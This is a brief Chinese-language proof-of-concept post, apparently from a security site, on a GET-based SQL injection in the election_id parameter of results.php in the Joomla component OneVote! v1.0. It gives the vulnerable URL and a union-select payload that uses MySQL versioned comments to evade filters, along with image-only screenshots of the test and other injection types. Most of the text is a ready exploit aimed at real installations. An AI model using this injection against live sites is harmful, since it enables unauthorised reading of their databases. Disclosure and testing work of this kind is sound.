Joomla! Component OneVote! v1.0 - SQL Injection
results.php中的election_id参数带入SQL语句存在GET类型注入
注入点:
http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
union注入 payload:
+/*!50000union*/+select+@@version-- -
测试截图:
data:image/s3,"s3://crabby-images/90a02/90a024711f69102b3ef9f848e958e1023b48c3da" alt=""
其他类型的注入:
data:image/s3,"s3://crabby-images/57519/57519493274b4e86454cf3e10f8965282b75a96d" alt=""
PoC验证:
data:image/s3,"s3://crabby-images/d5128/d5128ffedc496ed74a475033494c9b9ca720e245" alt=""
暂无评论